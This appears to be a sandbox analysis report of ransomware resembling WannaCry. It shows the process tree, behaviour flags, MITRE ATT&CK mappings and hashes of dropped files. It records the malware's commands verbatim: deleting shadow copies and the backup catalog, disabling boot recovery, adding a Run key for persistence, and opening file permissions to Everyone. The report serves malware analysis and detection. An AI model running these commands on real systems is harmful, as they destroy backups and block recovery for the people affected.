"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
2⤵
PID:5100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6080 /prefetch:8
2⤵
PID:3820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4744 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
2⤵
PID:2360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
2⤵
PID:2704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6304 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1872

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2448

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1428

C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
1⤵
PID:4452

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4176

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:484

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:2524

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\EnterWatch.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1104

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\Files be safe.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4228

C:\Users\Admin\Desktop\diskpart.exe
"C:\Users\Admin\Desktop\diskpart.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:3336

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:4028

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:224

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 210741721332294.bat
2⤵
PID:1780

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
2⤵
- Views/modifies file attributes
PID:3764

C:\Users\Admin\Desktop\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3340

C:\Users\Admin\Desktop\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1036

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
PID:3904

C:\Users\Admin\Desktop\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1048

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
PID:4348

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3360

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4108

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:2440

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "fjherctahpp827" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
2⤵
PID:5056

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "fjherctahpp827" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:4300

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3228

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3188

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2432

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3020

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1532

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5040

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2468

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:232

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:224

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3028

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2400

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:488

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3220

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2904

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1812

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4892

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4768

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1352

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:3300

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4236

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4044

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:4808

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2524

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1004

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:4992

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1088

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2144

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:224

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2876

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3028

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:1340

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1064

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:456

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:3412

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3456

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4716

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:1700

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:928

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4812

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:1556

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1580

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1080

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:3488

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2736

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4656

C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
2⤵
- Executes dropped EXE
PID:2968

C:\Users\Admin\Desktop\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1212

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2536

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c0f062e1807aca2379b4e5a1e7ffbda8

SHA1
076c2f58dfb70eefb6800df6398b7bf34771c82d

SHA256
f80debea5c7924a92b923901cd2f2355086fe0ce4be21e575d3d130cd05957ca

SHA512
24ae4ec0c734ef1e1227a25b8d8c4262b583de1101f2c9b336ac67d0ce9b3de08f2b5d44b0b2da5396860034ff02d401ad739261200ae032daa4f5085c6d669e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6f3725d32588dca62fb31e116345b5eb

SHA1
0229732ae5923f45de70e234bae88023521a9611

SHA256
b81d7e414b2b2d039d3901709a7b8d2f2f27133833ecf80488ba16991ce81140

SHA512
31bacf4f376c5bad364889a16f8ac61e5881c8e45b610cc0c21aa88453644524525fd4ccf85a87f73c0565c072af857e33acffbbca952df92fedddd21f169325

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
682cd29cb573b539858c1668327366ff

SHA1
d256ecf3fd1f6d02236ee535638541f62a3660e7

SHA256
f06b602ddddbbfcb61c0a8d3a416e54bde4842cb1ef70954040d7022d0f7abd3

SHA512
aab038f056c905ec340b415f17574f0ff3942e4599709fb4d727aff389a116d068f8fc0af0b63436f82e9bce9ff8330effb036e3c12123149ee237281be43019

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
0e28f52464a0cf79c8811ce63e098de1

SHA1
68e051f91c8bd7096b986f1b88afe4033d769255

SHA256
18af6fd5b309ae76ad44820bcf63674cb41d3a94766f277b0685a33e98bb54f9

SHA512
c7d282709472f8ff49131c4fbe765d1e89e316504a0242f0b705cb68e309bf8ceef8de720bba016f8e9f58680f07a6704a4de3321ff89988b6257fcdf501df45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7dc4126087cf9dedf2ca200851f384a3

SHA1
db50ac95325538a1e4d160e78f98b4c53c845723

SHA256
7a717689d6ecc8d11fc87329630070e6a7b9f8fbb6000413d08865b75bd95af3

SHA512
23b4e519ad4cd45a25d50374f3a5753856348b5dbcf4bcfa212eda66a1f974b526bfd4d617b411b3958fc7e492df26776bcd0a0980a5972b5e09a73b3acc4d30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
12KB

MD5
b17319ac46192fef3cc6b26322d0b38e

SHA1
525d26e7870f7690de86e41c4cc4d600e4504083

SHA256
899146a8df0c35a1217c75d7a1964b54adec1294d72b8f1bb26535e201e51578

SHA512
4a506531ae0d0b5b1102a9a22c83be9188e7cdd8f2d2b1476bb89b99c9cfaabc99d3304541bc9dff73b2817afa09b3c297925a1490a6a5496a979eef0d21f4ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
0043c7ce6529d1a517731488fcb81b22

SHA1
35ab77491237438755a253b02edd77cb399f08a5

SHA256
75b5d781754c993ddf66d526a2f9ef0ef305748975a976df7ecc541095b85198

SHA512
c4a894ff8e788fe8c571f3a915e3b04f461340cffa34d95eb7086a3452c0ac709e271151143906cd3623023b80462a2cbf851f03ef7a9338691c22554488f63f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
83dbfff50f3ccf9e84f23f72fa54d424

SHA1
5927d7cbc2a6ca161145e1b877737e329e6849f4

SHA256
8b2223cb3a46841d2c155ef2d1e0c44a20a696941cca3e7e7802cf60965742d8

SHA512
3d9627a148d536e94e7ae9fa0793d6788f1de8324b1ed2d6d3117113b6eb0f7bc2c54636113d331af400067adffacd104829d9933e83b3b168dbc316ad050aa6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
4153d3a0dbd7f6a9b89b14a29d558a15

SHA1
155176fbd3c19523e46803d045cd8b72108856dc

SHA256
ff8fb1206d1a50782924cf841735ea7d1527dd01affff4d3652057acc24712e9

SHA512
895d9dfa0aa8cb9f92834573474155cf9c26b1439ac071711d28f6fc7d3aada2ef1a6037f8ed5eb11f307237960a18acd0d9b0a6f98509027a4b30473a54c97f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
0236b4ba0e2b0653a0522dc5b8549704

SHA1
913357b7ca9c9573d89df9de382c04778daa2cd7

SHA256
eca08f68d23e5351ad03ff46d60ccc8695e5eea192c1ecf7c8cbf00df4b306a6

SHA512
350a61eda86d0ba01ce35acf0eee6d142659cf768a3734cf704cd627300d77954ed1c5b91e13e6fc002eabb23f5a77b92a2a2e0d39b90e6a2a7c6a31a368c52e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57e3b9.TMP

Filesize
48B

MD5
2f00618a0dc6503b720a2fb840e59c8f

SHA1
63a1e6e5d57ea482b413dacae11f0d6d9ed6f630

SHA256
65f63dc1a04de44a29ea2cf14faab80cd46d30a6370ce2f01e102be1f5d039d8

SHA512
72b006f5a3535fd374a8b897a68fdace1e719f05836b8bccb2d1a22674023ced4ac7c86805bc81278426bbb4e40da1f7057755369e2c663959ed61a24b02664a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
1229ac350f4ce4352bd63889cd59a328

SHA1
14dd176c5517e1a9f4254b1c9080683c0f5d14e1

SHA256
8494b4b0ed3d39fdc104b8d3ebeb4f1067d12e937f31de323134d57739378930

SHA512
38ac88a359681b3a29bd0b98318ccc15b6f5148eb70d20086cd7abbd134b78e5eb84757a35d0ad53b3fbcb34bc6a2d0d2256a1ea59534a2d769a1a9f0a459360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
58d1349b2cf4a4fdb49ff662c2f765c9

SHA1
7d1e7f51a882310827d01473ba097edf25093c9b

SHA256
2751988a9c6920eb5e4e626ee8e361c4d6c08925ff0aaf602ff815a66b3ea399

SHA512
80a5f5d8a3131f4fff8f9d134e77b58cbe2c38b5e2b8229412cf259ecc0ecc74a85e1a16cab3c3538de072a000eeb428ca67f8c7a5465d01b6bc3b0139d05eb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
8596f88b70db872270cfdb52c3818146

SHA1
2b0b747cea3e2503edd47bc510d64d2f00ba2f3e

SHA256
bdf44db8f3ea6cc4e2593bdf235e029e106b57c2721cfe88c28ab8fcf7d9bcb6

SHA512
35d9d20fd104cd7da8fed5cd42f1759b85389467dad4a0c4236783182025bd4b0f8c0cd1b1609169fec5501f0e6da8342717bc7cba4ce2f266219cd9fff6b181

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57dd40.TMP

Filesize
2KB

MD5
e04d786a8d29662a7c22d7011102bcfc

SHA1
e5f6268df6fcd92c082e7c6c8b88312a6f32ab90

SHA256
6ae7184d9a87fd28eb71ba21f551b65497df0e6c40dd7af7ecdc02184e7651df

SHA512
be639aae803b5c0ad77193e96aebabb5d74796d31e6b924298c77629426acd86e3edcb75ab4f52141706ce838b9f6940df196529a766f02b880bcc98d7d85668

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f6dddbeef04ca0c9e8f4d3fb917b0164

SHA1
1bd143035540ff5df9a67c0610b44e2a07ca236f

SHA256
58170bb0f7a97b65e9177d69dabdb0e12c4a515777397db170882cf186b9d32d

SHA512
c2bda226c1bed560f5bf801724d4e968030e801f1fd292394211584eb315ef5fbb28254a4f9fd386b6dd28445ff869c8ecf696e78c0dadd15f8098206c4a273b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d818c3e159de70b981e2e2ac139a9876

SHA1
c35b2cd124ffb81c817f169c1f2e714afeec8b7a

SHA256
a41c470f20b499aafac7c58a2c212440a3bc874780e123963b016dce4014460d

SHA512
e0be218e8e7d8bc302d30a4da416c0d8ea80194ced846393feaa0bc26bd1e9563573ee6d24be6d39814704372a1e999e69dbc308ee815abde87af1bdd12354c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
36c0f1e38e8c64b8ca2eeb1580298dfc

SHA1
dc07bbbb8209cb543e907ebe8dfa7139dd4d9ed3

SHA256
1962da7d8acceaad8552f16b27fe910eb051073576b25108d412e434ce082ccc

SHA512
36010d801f994388fbd5c115a1eb8964c9afd7a7a780dd46b7120e86e6af200014ac97193b902d665353f63185e1a34390e16439dad2a390706eaa9eb670febd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.json

Filesize
537B

MD5
72cc02c34c7335c9b80a6ea6611d8ad0

SHA1
e04b7f2ec5374fad77c7f0a161f2de799b4f25a1

SHA256
6dce24e626e2b5ba5fe20e92927a3245026ee879401e599ac03856e36ace596e

SHA512
157deec7b4f61a760f5c1d4868bf6b4ab842633cd15f8e8dc74ac978a4128e3ee3a3d57dcc4c57370b7baa3c9fe8280ebac3813bc095a5b2ee6a0d9b241c1f42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.json

Filesize
417B

MD5
c56ff60fbd601e84edd5a0ff1010d584

SHA1
342abb130dabeacde1d8ced806d67a3aef00a749

SHA256
200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c

SHA512
acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.json

Filesize
87B

MD5
e4e83f8123e9740b8aa3c3dfa77c1c04

SHA1
5281eae96efde7b0e16a1d977f005f0d3bd7aad0

SHA256
6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31

SHA512
bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json

Filesize
111B

MD5
4bca7d0ba72429fbe2e223c1509eeacd

SHA1
c0e69269473844e5485d59b8db2fb92ab421d5ca

SHA256
f8b06d6918a99f37e579550e1a002403aa3272e13a5aadf9f681a0accebe2722

SHA512
5b9cd0d44f2087ae6cf6e71ad7cf8ea5dc3525a926527034ce33ea19ac767a512ea241cb8cf03219eb6d0f3ebf06fd85883d4d274d035d6e566dc2baed32c236

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.json

Filesize
14B

MD5
6ca4960355e4951c72aa5f6364e459d5

SHA1
2fd90b4ec32804dff7a41b6e63c8b0a40b592113

SHA256
88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3

SHA512
8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\5CF44ACA-5F6E-4877-ADFC-3C921ADCD2A9

Filesize
168KB

MD5
16dcba2ab5fb5c69ddfffc667576af47

SHA1
42ce148294cf4d72ca0e11205d65a43097ae7c24

SHA256
ef67ee982304487d0905db14a742d1e928c71931eb71a2dc6fd3c2ded4d21400

SHA512
35a8206c3a91cece5f31100c547fc0300ee4f6b11ca5da5f5b42e9f86771d8447d3fa1f60496e35909936afc2b5c489201a1abf7e4d372be37d2850825da8218

Download Submit
